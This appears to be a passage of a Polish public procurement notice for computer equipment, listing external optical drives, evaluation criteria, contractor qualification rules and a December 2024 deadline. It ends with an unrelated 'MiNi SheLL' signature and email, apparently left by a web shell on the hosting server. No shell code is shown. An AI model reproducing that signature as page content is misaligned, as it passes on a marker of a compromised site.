tak<br/>gwarancja: 36 miesięcy<br/><br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla każdej części Zamawiający będzie się kierował następującymi kryteriami oceny ofert:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 11</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 11: Napędy zewnętrzne:<br/><br/>a) Fabrycznie nowy napęd zewnętrzny w ilości 3 szt., o minimalnych parametrach technicznych:<br/><br/>Rodzaj napędu: Zewnętrzny<br/>Funkcje napędu: Nagrywanie płyt DVD, Nagrywanie płyt CD, Odtwarzanie płyt DVD, Odtwarzanie płyt CD<br/>Interfejs: USB 2.0<br/>Prędkość zapisu: DVD±R - 8x, DVD±R DL - 6x, DVD-RAM - 5x, DVD+RW - 8x, DVD-RW - 8x, CD-R - 24x, CD-RW - 24x, M-DISC(DVD) - 4x<br/>Prędkość odczytu: DVD-ROM - 8x, CD-ROM - 24x, M-DISC(DVD) - 8x, DVD±R - 8x, DVD-RAM - 6x, DVD+RW - 8x, DVD-RW - 8x, CD-R - 24x, CD-RW - 24x<br/>Gwarancja: 24 miesiące<br/><br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych.<br/><br/>b) Fabrycznie nowy napęd zewnętrzny w ilości 1 szt., o minimalnych parametrach technicznych:<br/><br/>Rodzaj napędu: Zewnętrzny<br/>Zapis BD-R: 6 x<br/>Zapis BD-R DL: 6 x<br/>Zapis DVD+/-R: 8 x<br/>Zapis DVD+/-R DL: 4 x<br/>Zapis CD-R: 24 x<br/>Zapis CD-RW: 24 x<br/>Odczyt BD-ROM: 6 x<br/>Odczyt DVD-ROM: 8 x<br/>Odczyt CD-ROM: 24 x<br/>Niezawodność MTBF: 60000 godz.<br/>Gwarancja: 24 miesiące<br/><br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30233132-5 - Napędy dyskowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla każdej części Zamawiający będzie się kierował następującymi kryteriami oceny ofert:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące (dotyczy wszystkich części postępowania):<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, <br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z postępowania zgodnie z Załącznikiem nr 2 do SWZ.<br/>2. Do oferty Wykonawca zobowiązany jest dołączyć odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. W przypadku składania oferty przez podmioty występujące wspólnie wymóg dotyczy każdego z Wykonawców. Powyższy wymóg dotyczy także podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy.<br/>3. Oświadczenia i dokumenty składane na wezwanie:<br/>1)	Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 ustawy, w tym również oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 1616), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej lub w zakresie podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4, 5, 8 i 10 – Załącznik nr 7 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z Załącznikiem nr 2 do SWZ;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) zobowiązanie innego podmiotu, o którym mowa w Rozdziale X Pkt. A ust. 5 SWZ (jeżeli dotyczy);<br/>2) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia (w tym także spółki cywilnej) składane na podstawie art. 117 ust. 4 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, o którym mowa w Rozdziale X Pkt. A ust. 4 SWZ (jeżeli dotyczy);<br/>3) oświadczenie podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, o którym mowa w Rozdziale X Pkt. A ust. 6 (jeżeli dotyczy);<br/>4) Oświadczenie Podwykonawcy NIEBĘDĄCEGO podmiotem udostępniającym zasoby potwierdzające brak podstaw wykluczenia tego podmiotu, o którym mowa w Rozdziale X Pkt. A ust. 7 (jeżeli dotyczy);<br/>5) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, <br/>o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 Pzp. oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 8 do SWZ.<br/>2.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-11 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi załącznikami należy złożyć poprzez Platformę e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-11 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com